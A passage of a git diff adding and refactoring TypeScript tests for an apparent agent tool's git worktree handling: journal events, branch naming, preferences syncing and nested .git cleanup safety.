   const betaBranch = getSliceBranchName("M001", "S01", "beta");
   run(`git checkout -b ${betaBranch}`, wt2.path);
-  assertEq(getCurrentBranch(wt2.path), "gsd/beta/M001/S01", "beta has its own namespaced branch");
+  assert.deepStrictEqual(getCurrentBranch(wt2.path), "gsd/beta/M001/S01", "beta has its own namespaced branch");
 
   // Alpha worktree can re-create S01 too (it was already merged+deleted earlier)
   const alphaReBranch = getSliceBranchName("M001", "S01", "alpha");
   run(`git checkout -b ${alphaReBranch}`, wt.path);
-  assertEq(getCurrentBranch(wt.path), "gsd/alpha/M001/S01", "alpha re-created S01");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "gsd/alpha/M001/S01", "alpha re-created S01");
 
   // Both exist simultaneously
   const allBranches = run("git branch", base);
-  assertTrue(allBranches.includes("gsd/alpha/M001/S01"), "alpha S01 branch exists");
-  assertTrue(allBranches.includes("gsd/beta/M001/S01"), "beta S01 branch exists");
+  assert.ok(allBranches.includes("gsd/alpha/M001/S01"), "alpha S01 branch exists");
+  assert.ok(allBranches.includes("gsd/beta/M001/S01"), "beta S01 branch exists");
 
   // ── State derivation in worktree ───────────────────────────────────────────
 
@@ -173,8 +183,8 @@ async function main(): Promise<void> {
   // Switch alpha back to its base so deriveState sees milestone files
   run("git checkout worktree/alpha", wt.path);
   const state = await deriveState(wt.path);
-  assertTrue(state.activeMilestone !== null, "worktree has active milestone");
-  assertEq(state.activeMilestone?.id, "M001", "correct milestone");
+  assert.ok(state.activeMilestone !== null, "worktree has active milestone");
+  assert.deepStrictEqual(state.activeMilestone?.id, "M001", "correct milestone");
 
   // ── autoCommitCurrentBranch in worktree ────────────────────────────────────
 
@@ -183,8 +193,8 @@ async function main(): Promise<void> {
   run(`git checkout ${betaBranch}`, wt2.path);
   writeFileSync(join(wt2.path, "dirty.txt"), "uncommitted\n", "utf-8");
   const commitMsg = autoCommitCurrentBranch(wt2.path, "execute-task", "M001/S01/T01");
-  assertTrue(commitMsg !== null, "auto-commit works in worktree");
-  assertEq(run("git status --short", wt2.path), "", "worktree clean after auto-commit");
+  assert.ok(commitMsg !== null, "auto-commit works in worktree");
+  assert.deepStrictEqual(run("git status --short", wt2.path), "", "worktree clean after auto-commit");
 
   // ── Cleanup ────────────────────────────────────────────────────────────────
 
@@ -194,14 +204,13 @@ async function main(): Promise<void> {
   run("git checkout worktree/beta", wt2.path);
   removeWorktree(base, "alpha", { deleteBranch: true });
   removeWorktree(base, "beta", { deleteBranch: true });
-  assertEq(listWorktrees(base).length, 0, "all worktrees removed");
+  assert.deepStrictEqual(listWorktrees(base).length, 0, "all worktrees removed");
 
   rmSync(base, { recursive: true, force: true });
 
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  // Restore HOME and reset caches
+  process.env.HOME = originalHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+  rmSync(fakeHome, { recursive: true, force: true });
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-journal-events.test.ts b/src/resources/extensions/gsd/tests/worktree-journal-events.test.ts
new file mode 100644
index 000000000..b0bb7631b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-journal-events.test.ts
@@ -0,0 +1,220 @@
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, rmSync, readFileSync, readdirSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import {
+  WorktreeResolver,
+  type WorktreeResolverDeps,
+  type NotifyCtx,
+} from "../worktree-resolver.js";
+import { AutoSession } from "../auto/session.js";
+import type { JournalEntry } from "../journal.js";
+
+// ─── Helpers ─────────────────────────────────────────────────────────────────
+
+function makeSession(
+  overrides?: Partial<{ basePath: string; originalBasePath: string }>,
+): AutoSession {
+  const s = new AutoSession();
+  s.basePath = overrides?.basePath ?? "/project";
+  s.originalBasePath = overrides?.originalBasePath ?? "/project";
+  return s;
+}
+
+function makeDeps(
+  overrides?: Partial<WorktreeResolverDeps>,
+): WorktreeResolverDeps {
+  const deps: WorktreeResolverDeps = {
+    isInAutoWorktree: () => false,
+    shouldUseWorktreeIsolation: () => true,
+    getIsolationMode: () => "worktree",
+    mergeMilestoneToMain: () => ({ pushed: false, codeFilesChanged: true }),
+    syncWorktreeStateBack: () => ({ synced: [] }),
+    teardownAutoWorktree: () => {},
+    createAutoWorktree: (_basePath: string, milestoneId: string) =>
+      `/project/.gsd/worktrees/${milestoneId}`,
+    enterAutoWorktree: (_basePath: string, milestoneId: string) =>
+      `/project/.gsd/worktrees/${milestoneId}`,
+    getAutoWorktreePath: () => null,
+    autoCommitCurrentBranch: () => {},
+    getCurrentBranch: () => "main",
+    autoWorktreeBranch: (milestoneId: string) => `milestone/${milestoneId}`,
+    resolveMilestoneFile: (_basePath: string, milestoneId: string) =>
+      `/project/.gsd/milestones/${milestoneId}/${milestoneId}-ROADMAP.md`,
+    readFileSync: () => "# Roadmap\n- [x] S01: Slice one\n",
+    GitServiceImpl: class {
+      constructor() {}
+    } as unknown as WorktreeResolverDeps["GitServiceImpl"],
+    loadEffectiveGSDPreferences: () => ({ preferences: { git: {} } }),
+    invalidateAllCaches: () => {},
+    captureIntegrationBranch: () => {},
+    ...overrides,
+  };
+  return deps;
+}
+
+function makeNotifyCtx(): NotifyCtx {
+  return {
+    notify: () => {},
+  };
+}
+
+/** Read all journal entries from a temp .gsd/journal directory. */
+function readJournalEntries(basePath: string): JournalEntry[] {
+  const journalDir = join(basePath, ".gsd", "journal");
+  try {
+    const files = readdirSync(journalDir).filter(f => f.endsWith(".jsonl")).sort();
+    const entries: JournalEntry[] = [];
+    for (const file of files) {
+      const raw = readFileSync(join(journalDir, file), "utf-8");
+      for (const line of raw.split("\n")) {
+        if (!line.trim()) continue;
+        entries.push(JSON.parse(line) as JournalEntry);
+      }
+    }
+    return entries;
+  } catch {
+    return [];
+  }
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("worktree journal events", () => {
+  let tmp: string;
+  const originalCwd = process.cwd();
+
+  beforeEach(() => {
+    tmp = mkdtempSync(join(tmpdir(), "wt-journal-"));
+  });
+  afterEach(() => {
+    // Restore cwd before cleanup — on Windows, rmSync fails with EPERM
+    // if the process cwd is inside the directory being deleted.
+    try { process.chdir(originalCwd); } catch { /* best-effort */ }
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  test("enterMilestone emits worktree-enter on success (new worktree)", () => {
+    const s = makeSession({ basePath: tmp, originalBasePath: tmp });
+    const deps = makeDeps({ getAutoWorktreePath: () => null });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.enterMilestone("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const enter = entries.find(e => e.eventType === "worktree-enter");
+    assert.ok(enter, "worktree-enter event should be emitted");
+    assert.equal(enter!.data?.milestoneId, "M001");
+    assert.equal(enter!.data?.created, true);
+    assert.ok(enter!.data?.wtPath);
+  });
+
+  test("enterMilestone emits worktree-enter with created=false for existing worktree", () => {
+    const s = makeSession({ basePath: tmp, originalBasePath: tmp });
+    const deps = makeDeps({
+      getAutoWorktreePath: () => "/project/.gsd/worktrees/M001",
+    });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.enterMilestone("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const enter = entries.find(e => e.eventType === "worktree-enter");
+    assert.ok(enter, "worktree-enter event should be emitted");
+    assert.equal(enter!.data?.created, false);
+  });
+
+  test("enterMilestone emits worktree-skip when isolation disabled", () => {
+    const s = makeSession({ basePath: tmp, originalBasePath: tmp });
+    const deps = makeDeps({ shouldUseWorktreeIsolation: () => false });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.enterMilestone("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const skip = entries.find(e => e.eventType === "worktree-skip");
+    assert.ok(skip, "worktree-skip event should be emitted");
+    assert.equal(skip!.data?.milestoneId, "M001");
+    assert.equal(skip!.data?.reason, "isolation-disabled");
+  });
+
+  test("enterMilestone emits worktree-create-failed on error", () => {
+    const s = makeSession({ basePath: tmp, originalBasePath: tmp });
+    const deps = makeDeps({
+      getAutoWorktreePath: () => null,
+      createAutoWorktree: () => { throw new Error("disk full"); },
+    });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.enterMilestone("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const failed = entries.find(e => e.eventType === "worktree-create-failed");
+    assert.ok(failed, "worktree-create-failed event should be emitted");
+    assert.equal(failed!.data?.milestoneId, "M001");
+    assert.equal(failed!.data?.error, "disk full");
+    assert.equal(failed!.data?.fallback, "project-root");
+  });
+
+  test("mergeAndExit emits worktree-merge-start", () => {
+    const s = makeSession({
+      basePath: join(tmp, "worktree"),
+      originalBasePath: tmp,
+    });
+    const deps = makeDeps({
+      isInAutoWorktree: () => true,
+      getIsolationMode: () => "worktree",
+    });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.mergeAndExit("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const start = entries.find(e => e.eventType === "worktree-merge-start");
+    assert.ok(start, "worktree-merge-start event should be emitted");
+    assert.equal(start!.data?.milestoneId, "M001");
+    assert.equal(start!.data?.mode, "worktree");
+  });
+
+  test("mergeAndExit emits worktree-merge-failed on error", () => {
+    const s = makeSession({
+      basePath: join(tmp, "worktree"),
+      originalBasePath: tmp,
+    });
+    const deps = makeDeps({
+      isInAutoWorktree: () => true,
+      getIsolationMode: () => "worktree",
+      mergeMilestoneToMain: () => { throw new Error("conflict in main"); },
+    });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.mergeAndExit("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    const failed = entries.find(e => e.eventType === "worktree-merge-failed");
+    assert.ok(failed, "worktree-merge-failed event should be emitted");
+    assert.equal(failed!.data?.milestoneId, "M001");
+    assert.equal(failed!.data?.error, "conflict in main");
+  });
+
+  test("journal entries have valid flowId, seq, and ts fields", () => {
+    const s = makeSession({ basePath: tmp, originalBasePath: tmp });
+    const deps = makeDeps({ shouldUseWorktreeIsolation: () => false });
+    const resolver = new WorktreeResolver(s, deps);
+
+    resolver.enterMilestone("M001", makeNotifyCtx());
+
+    const entries = readJournalEntries(tmp);
+    assert.ok(entries.length > 0, "at least one entry should exist");
+    const entry = entries[0];
+    assert.ok(entry.flowId, "flowId should be set");
+    assert.ok(
+      /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/.test(entry.flowId),
+      "flowId should be a valid UUID",
+    );
+    assert.equal(entry.seq, 0);
+    assert.ok(entry.ts, "ts should be set");
+    assert.ok(!isNaN(Date.parse(entry.ts)), "ts should be a valid ISO date");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-main-branch.test.ts b/src/resources/extensions/gsd/tests/worktree-main-branch.test.ts
new file mode 100644
index 000000000..f691f73bd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-main-branch.test.ts
@@ -0,0 +1,20 @@
+/**
+ * Regression test for #3461: createAutoWorktree must use git.main_branch
+ * preference when META.json integration branch is absent.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+test("auto-worktree.ts includes main_branch preference in startPoint fallback (#3461)", () => {
+  const src = readFileSync(
+    join(import.meta.dirname, "..", "auto-worktree.ts"),
+    "utf-8",
+  );
+  // The fix adds gitPrefs?.main_branch to the startPoint fallback chain
+  assert.ok(
+    src.includes("gitPrefs?.main_branch") || src.includes("prefs.main_branch"),
+    "createAutoWorktree must check git.main_branch preference before falling back to nativeDetectMainBranch",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-manager.test.ts b/src/resources/extensions/gsd/tests/worktree-manager.test.ts
index 9b836ad30..68b038d81 100644
--- a/src/resources/extensions/gsd/tests/worktree-manager.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-manager.test.ts
@@ -1,4 +1,4 @@
-import test from "node:test";
+import { describe, test, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs";
 import { join } from "node:path";
@@ -73,9 +73,12 @@ test("worktreeBranchName formats branch name", () => {
 
 // ─── createWorktree ───────────────────────────────────────────────────────────
 
-test("createWorktree creates worktree with correct metadata", () => {
-  const base = makeBaseRepo();
-  try {
+describe("createWorktree", () => {
+  let base: string;
+  beforeEach(() => { base = makeBaseRepo(); });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("creates worktree with correct metadata", () => {
     const info = createWorktree(base, "feature-x");
     assert.strictEqual(info.name, "feature-x", "name should match");
     assert.strictEqual(info.branch, "worktree/feature-x", "branch should be prefixed");
@@ -88,33 +91,9 @@ test("createWorktree creates worktree with correct metadata", () => {
     );
     const branches = run("git branch", base);
     assert.ok(branches.includes("worktree/feature-x"), "branch should be created in base repo");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-});
+  });
 
-test("createWorktree rejects duplicate name", () => {
-  const { base } = makeRepoWithWorktree("feature-x");
-  try {
-    assert.throws(
-      () => createWorktree(base, "feature-x"),
-      (err: Error) => {
-        assert.ok(
-          err.message.includes("already exists"),
-          `expected "already exists" in error, got: ${err.message}`,
-        );
-        return true;
-      },
-      "should throw on duplicate worktree name",
-    );
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-});
-
-test("createWorktree rejects invalid name", () => {
-  const base = makeBaseRepo();
-  try {
+  test("rejects invalid name", () => {
     assert.throws(
       () => createWorktree(base, "bad name!"),
       (err: Error) => {
@@ -126,42 +105,68 @@ test("createWorktree rejects invalid name", () => {
       },
       "should throw on invalid worktree name",
     );
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
+});
+
+describe("createWorktree — duplicate rejection", () => {
+  let base: string;
+  beforeEach(() => {
+    const repo = makeRepoWithWorktree("feature-x");
+    base = repo.base;
+  });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("rejects duplicate name", () => {
+    assert.throws(
+      () => createWorktree(base, "feature-x"),
+      (err: Error) => {
+        assert.ok(
+          err.message.includes("already exists"),
+          `expected "already exists" in error, got: ${err.message}`,
+        );
+        return true;
+      },
+      "should throw on duplicate worktree name",
+    );
+  });
 });
 
 // ─── listWorktrees ────────────────────────────────────────────────────────────
 
-test("listWorktrees returns active worktrees", () => {
-  const { base } = makeRepoWithWorktree("feature-x");
-  try {
+describe("listWorktrees", () => {
+  let base: string;
+  beforeEach(() => {
+    const repo = makeRepoWithWorktree("feature-x");
+    base = repo.base;
+  });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("returns active worktrees", () => {
     const list = listWorktrees(base);
     assert.strictEqual(list.length, 1, "should list exactly one worktree");
     assert.strictEqual(list[0]!.name, "feature-x", "name should match");
     assert.strictEqual(list[0]!.branch, "worktree/feature-x", "branch should match");
     assert.ok(list[0]!.exists, "exists flag should be true");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-});
+  });
 
-test("listWorktrees returns empty after removal", () => {
-  const { base } = makeRepoWithWorktree("feature-x");
-  try {
+  test("returns empty after removal", () => {
     removeWorktree(base, "feature-x");
     const list = listWorktrees(base);
     assert.strictEqual(list.length, 0, "should have no worktrees after removal");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
 });
 
 // ─── diffWorktreeGSD ─────────────────────────────────────────────────────────
 
-test("diffWorktreeGSD detects added and modified GSD files", () => {
-  const { base } = makeRepoWithChanges("feature-x");
-  try {
+describe("diffWorktreeGSD and getWorktreeGSDDiff", () => {
+  let base: string;
+  beforeEach(() => {
+    const repo = makeRepoWithChanges("feature-x");
+    base = repo.base;
+  });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("detects added and modified GSD files", () => {
     const diff = diffWorktreeGSD(base, "feature-x");
     assert.ok(diff.added.length > 0, "should have added files");
     assert.ok(
@@ -174,58 +179,60 @@ test("diffWorktreeGSD detects added and modified GSD files", () => {
       "M001 roadmap should be in modified files",
     );
     assert.strictEqual(diff.removed.length, 0, "should have no removed files");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
-});
+  });
 
-// ─── getWorktreeGSDDiff ───────────────────────────────────────────────────────
-
-test("getWorktreeGSDDiff returns patch content", () => {
-  const { base } = makeRepoWithChanges("feature-x");
-  try {
+  test("returns patch content", () => {
     const fullDiff = getWorktreeGSDDiff(base, "feature-x");
     assert.ok(fullDiff.includes("M002"), "diff should mention M002");
     assert.ok(fullDiff.includes("updated"), "diff should mention the update");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
 });
 
 // ─── getWorktreeLog ───────────────────────────────────────────────────────────
 
-test("getWorktreeLog shows commits", () => {
-  const { base } = makeRepoWithChanges("feature-x");
-  try {
+describe("getWorktreeLog", () => {
+  let base: string;
+  beforeEach(() => {
+    const repo = makeRepoWithChanges("feature-x");
+    base = repo.base;
+  });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("shows commits", () => {
     const log = getWorktreeLog(base, "feature-x");
     assert.ok(log.includes("add M002"), "log should include the commit message");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
 });
 
 // ─── removeWorktree ───────────────────────────────────────────────────────────
 
-test("removeWorktree removes directory and branch", () => {
-  const { base, wtPath } = makeRepoWithWorktree("feature-x");
-  try {
+describe("removeWorktree", () => {
+  let base: string;
+  let wtPath: string;
+  beforeEach(() => {
+    const repo = makeRepoWithWorktree("feature-x");
+    base = repo.base;
+    wtPath = repo.wtPath;
+  });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("removes directory and branch", () => {
     removeWorktree(base, "feature-x", { deleteBranch: true });
     assert.ok(!existsSync(wtPath), "worktree directory should be gone");
     const branches = run("git branch", base);
     assert.ok(!branches.includes("worktree/feature-x"), "branch should be deleted");
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
 });
 
-test("removeWorktree on missing worktree does not throw", () => {
-  const base = makeBaseRepo();
-  try {
+describe("removeWorktree — missing worktree", () => {
+  let base: string;
+  beforeEach(() => { base = makeBaseRepo(); });
+  afterEach(() => { rmSync(base, { recursive: true, force: true }); });
+
+  test("on missing worktree does not throw", () => {
     assert.doesNotThrow(
       () => removeWorktree(base, "nonexistent"),
       "should not throw when worktree does not exist",
     );
-  } finally {
-    rmSync(base, { recursive: true, force: true });
-  }
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-nested-git-safety.test.ts b/src/resources/extensions/gsd/tests/worktree-nested-git-safety.test.ts
new file mode 100644
index 000000000..27ec1383a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-nested-git-safety.test.ts
@@ -0,0 +1,101 @@
+/**
+ * worktree-nested-git-safety.test.ts — #2616
+ *
+ * When scaffolding tools (create-next-app, cargo init, etc.) run inside a
+ * worktree, they create nested .git directories. Git treats these as gitlinks
+ * (mode 160000) without a .gitmodules entry, so the worktree cleanup destroys
+ * the only copy of those object databases — causing permanent data loss.
+ *
+ * This test verifies that removeWorktree detects nested .git directories
+ * (orphaned gitlinks) and absorbs or removes them before cleanup so files
+ * are tracked as regular content instead of unreachable gitlink pointers.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const srcPath = join(import.meta.dirname, "..", "worktree-manager.ts");
+const src = readFileSync(srcPath, "utf-8");
+
+console.log("\n=== #2616: Worktree cleanup detects nested .git directories ===");
+
+// ── Test 1: removeWorktree scans for nested .git directories ─────────
+
+const removeWorktreeIdx = src.indexOf("export function removeWorktree");
+assertTrue(removeWorktreeIdx > 0, "worktree-manager.ts exports removeWorktree");
+
+const fnBody = src.slice(removeWorktreeIdx, removeWorktreeIdx + 5000);
+
+const detectsNestedGit =
+  fnBody.includes("nested") && fnBody.includes(".git") ||
+  fnBody.includes("gitlink") ||
+  fnBody.includes("160000") ||
+  fnBody.includes("findNestedGitDirs") ||
+  fnBody.includes("nestedGitDirs");
+
+assertTrue(
+  detectsNestedGit,
+  "removeWorktree detects nested .git directories or gitlinks (#2616)",
+);
+
+// ── Test 2: A helper function exists to find nested .git directories ──
+
+const hasNestedGitHelper =
+  src.includes("findNestedGitDirs") ||
+  src.includes("detectNestedGitDirs") ||
+  src.includes("scanNestedGit") ||
+  src.includes("absorbNestedGit") ||
+  src.includes("nestedGitDirs");
+
+assertTrue(
+  hasNestedGitHelper,
+  "worktree-manager has a helper to find nested .git directories (#2616)",
+);
+
+// ── Test 3: Nested .git dirs are absorbed or removed before cleanup ───
+
+const absorbsOrRemoves =
+  fnBody.includes("absorb") ||
+  fnBody.includes("rmSync") && fnBody.includes("nested") ||
+  (fnBody.includes("nestedGitDirs") || fnBody.includes("findNestedGitDirs")) &&
+    (fnBody.includes("rm") || fnBody.includes("absorb") || fnBody.includes("remove"));
+
+assertTrue(
+  absorbsOrRemoves,
+  "removeWorktree absorbs or removes nested .git dirs before cleanup (#2616)",
+);
+
+// ── Test 4: A warning is logged when nested .git dirs are found ───────
+
+const warnsAboutNestedGit =
+  fnBody.includes("nested") && fnBody.includes("logWarning") ||
+  fnBody.includes("gitlink") && fnBody.includes("logWarning") ||
+  fnBody.includes("scaffold") && fnBody.includes("logWarning");
+
+assertTrue(
+  warnsAboutNestedGit,
+  "removeWorktree warns when nested .git directories are detected (#2616)",
+);
+
+// ── Test 5: The findNestedGitDirs helper correctly identifies nested repos ──
+// Verify the helper scans subdirectories but skips .gsd/, node_modules/, .git/
+
+const helperBody = src.includes("findNestedGitDirs")
+  ? src.slice(src.indexOf("findNestedGitDirs"))
+  : "";
+
+const skipsExcludedDirs =
+  helperBody.includes("node_modules") ||
+  helperBody.includes(".gsd") ||
+  helperBody.includes("skip") ||
+  helperBody.includes("exclude");
+
+assertTrue(
+  skipsExcludedDirs,
+  "findNestedGitDirs skips node_modules and other excluded directories (#2616)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/worktree-preferences-sync.test.ts b/src/resources/extensions/gsd/tests/worktree-preferences-sync.test.ts
new file mode 100644
index 000000000..691d58827
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-preferences-sync.test.ts
@@ -0,0 +1,155 @@
+/**
+ * worktree-preferences-sync.test.ts — Regression test for #2684.
+ *
+ * Verifies that canonical PREFERENCES.md is seeded into auto-mode worktrees,
+ * while legacy lowercase preferences.md remains supported:
+ *
+ *   1. syncGsdStateToWorktree() forward-syncs PREFERENCES.md (additive only)
+ *   2. syncGsdStateToWorktree() still accepts legacy lowercase preferences.md
+ *   3. syncWorktreeStateBack() does NOT overwrite project root PREFERENCES.md
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import {
+  existsSync,
+  mkdirSync,
+  mkdtempSync,
+  readFileSync,
+  readdirSync,
+  rmSync,
+  writeFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  syncGsdStateToWorktree,
+  syncWorktreeStateBack,
+} from "../auto-worktree.ts";
+
+// ─── Helpers ─────────────────────────────────────────────────────────
+
+function makeTempDir(prefix: string): string {
+  return mkdtempSync(join(tmpdir(), `gsd-prefs-test-${prefix}-`));
+}
+
+function cleanup(...dirs: string[]): void {
+  for (const dir of dirs) {
+    rmSync(dir, { recursive: true, force: true });
+  }
+}
+
+function writeFile(dir: string, relativePath: string, content: string): void {
+  const fullPath = join(dir, relativePath);
+  mkdirSync(join(fullPath, ".."), { recursive: true });
+  writeFileSync(fullPath, content, "utf-8");
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────
+
+const PREFS_CONTENT = [
+  "# Preferences",
+  "",
+  "post_unit_hooks:",
+  "  - npm run lint",
+  "",
+  "skill_rules:",
+  '  - use: "frontend-design"',
+].join("\n");
+
+test("#2684: syncGsdStateToWorktree forward-syncs PREFERENCES.md when missing from worktree", (t) => {
+  const mainBase = makeTempDir("main");
+  const wtBase = makeTempDir("wt");
+  t.after(() => cleanup(mainBase, wtBase));
+
+  // Project root has canonical PREFERENCES.md
+  writeFile(mainBase, ".gsd/PREFERENCES.md", PREFS_CONTENT);
+
+  // Worktree has .gsd/ but no preferences file
+  mkdirSync(join(wtBase, ".gsd"), { recursive: true });
+
+  const result = syncGsdStateToWorktree(mainBase, wtBase);
+
+  assert.ok(
+    existsSync(join(wtBase, ".gsd", "PREFERENCES.md")),
+    "PREFERENCES.md should be copied to worktree",
+  );
+  assert.equal(
+    readFileSync(join(wtBase, ".gsd", "PREFERENCES.md"), "utf-8"),
+    PREFS_CONTENT,
+    "PREFERENCES.md content should match source",
+  );
+  assert.ok(
+    result.synced.includes("PREFERENCES.md"),
+    "PREFERENCES.md should appear in synced list",
+  );
+});
+
+test("syncGsdStateToWorktree still accepts legacy lowercase preferences.md", (t) => {
+  const mainBase = makeTempDir("main");
+  const wtBase = makeTempDir("wt");
+  t.after(() => cleanup(mainBase, wtBase));
+
+  writeFile(mainBase, ".gsd/preferences.md", PREFS_CONTENT);
+  mkdirSync(join(wtBase, ".gsd"), { recursive: true });
+
+  const result = syncGsdStateToWorktree(mainBase, wtBase);
+
+  const copiedEntries = readdirSync(join(wtBase, ".gsd"))
+    .filter((name) => name === "PREFERENCES.md" || name === "preferences.md");
+
+  assert.ok(
+    copiedEntries.length === 1,
+    `expected exactly one preferences file in worktree, got ${copiedEntries.join(", ") || "(none)"}`,
+  );
+  assert.ok(
+    result.synced.includes("preferences.md") || result.synced.includes("PREFERENCES.md"),
+    "legacy source should still appear in synced list",
+  );
+});
+
+test("#2684: syncGsdStateToWorktree does NOT overwrite existing worktree preferences file", (t) => {
+  const mainBase = makeTempDir("main");
+  const wtBase = makeTempDir("wt");
+  t.after(() => cleanup(mainBase, wtBase));
+
+  const rootPrefs = "# Root preferences\nold: true";
+  const wtPrefs = "# Worktree preferences\nmodified: true";
+
+  writeFile(mainBase, ".gsd/PREFERENCES.md", rootPrefs);
+  writeFile(wtBase, ".gsd/PREFERENCES.md", wtPrefs);
+
+  syncGsdStateToWorktree(mainBase, wtBase);
+
+  assert.equal(
+    readFileSync(join(wtBase, ".gsd", "PREFERENCES.md"), "utf-8"),
+    wtPrefs,
+    "existing worktree PREFERENCES.md must not be overwritten",
+  );
+});
+
+test("#2684: syncWorktreeStateBack does NOT overwrite project root PREFERENCES.md", (t) => {
+  const mainBase = makeTempDir("main");
+  const wtBase = makeTempDir("wt");
+  const mid = "M001";
+  t.after(() => cleanup(mainBase, wtBase));
+
+  const rootPrefs = "# Root preferences\nauthoritative: true";
+  const wtPrefs = "# Worktree preferences\nstale-copy: true";
+
+  writeFile(mainBase, ".gsd/PREFERENCES.md", rootPrefs);
+  writeFile(wtBase, ".gsd/PREFERENCES.md", wtPrefs);
+
+  // Worktree needs at least a milestone dir for the function to proceed
+  mkdirSync(join(wtBase, ".gsd", "milestones", mid), { recursive: true });
+  mkdirSync(join(mainBase, ".gsd", "milestones"), { recursive: true });
+
+  syncWorktreeStateBack(mainBase, wtBase, mid);
+
+  assert.equal(
+    readFileSync(join(mainBase, ".gsd", "PREFERENCES.md"), "utf-8"),
+    rootPrefs,
+    "project root PREFERENCES.md must NOT be overwritten by worktree copy",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-resolver.test.ts b/src/resources/extensions/gsd/tests/worktree-resolver.test.ts
index 2c4330dfe..97a766f3c 100644
--- a/src/resources/extensions/gsd/tests/worktree-resolver.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-resolver.test.ts
@@ -139,11 +139,10 @@ function makeDeps(
     captureIntegrationBranch: (
       basePath: string,
       mid: string | undefined,
-      opts?: { commitDocs?: boolean },
     ) => {
       calls.push({
         fn: "captureIntegrationBranch",
-        args: [basePath, mid, opts],
+        args: [basePath, mid],
       });
     },
     ...overrides,
@@ -482,7 +481,8 @@ test("mergeAndExit resolves roadmap from worktree when missing at project root (
 
   // Should have called mergeMilestoneToMain, not bare teardown
   assert.equal(findCalls(deps.calls, "mergeMilestoneToMain").length, 1);
-  assert.equal(findCalls(deps.calls, "teardownAutoWorktree").length, 0);
+  // #2945 Bug 3: secondary teardown is now called after merge for cleanup
+  assert.equal(findCalls(deps.calls, "teardownAutoWorktree").length, 1);
   assert.equal(s.basePath, "/project"); // restored
   assert.ok(ctx.messages.some((m) => m.msg.includes("merged to main")));
 });
@@ -550,6 +550,40 @@ test("mergeAndExit failure message tells user worktree and branch are preserved
   );
 });
 
+test("mergeAndExit failure message references /gsd dispatch complete-milestone, not /complete-milestone (#1891)", () => {
+  // Regression test: the failure notification previously told users to
+  // "retry /complete-milestone" — a command that does not exist. The correct
+  // recovery command is "/gsd dispatch complete-milestone".
+  const s = makeSession({
+    basePath: "/project/.gsd/worktrees/M001",
+    originalBasePath: "/project",
+  });
+  const deps = makeDeps({
+    isInAutoWorktree: () => true,
+    getIsolationMode: () => "worktree",
+    mergeMilestoneToMain: () => {
+      throw new Error("dirty working tree");
+    },
+  });
+  const ctx = makeNotifyCtx();
+  const resolver = new WorktreeResolver(s, deps);
+
+  resolver.mergeAndExit("M001", ctx);
+
+  const warning = ctx.messages.find((m) => m.level === "warning");
+  assert.ok(warning, "a warning message is emitted");
+  // Must reference the correct dispatch command
+  assert.ok(
+    warning!.msg.includes("/gsd dispatch complete-milestone"),
+    "warning references /gsd dispatch complete-milestone, not bare /complete-milestone",
+  );
+  // Must NOT contain the bare (incorrect) command without the dispatch prefix
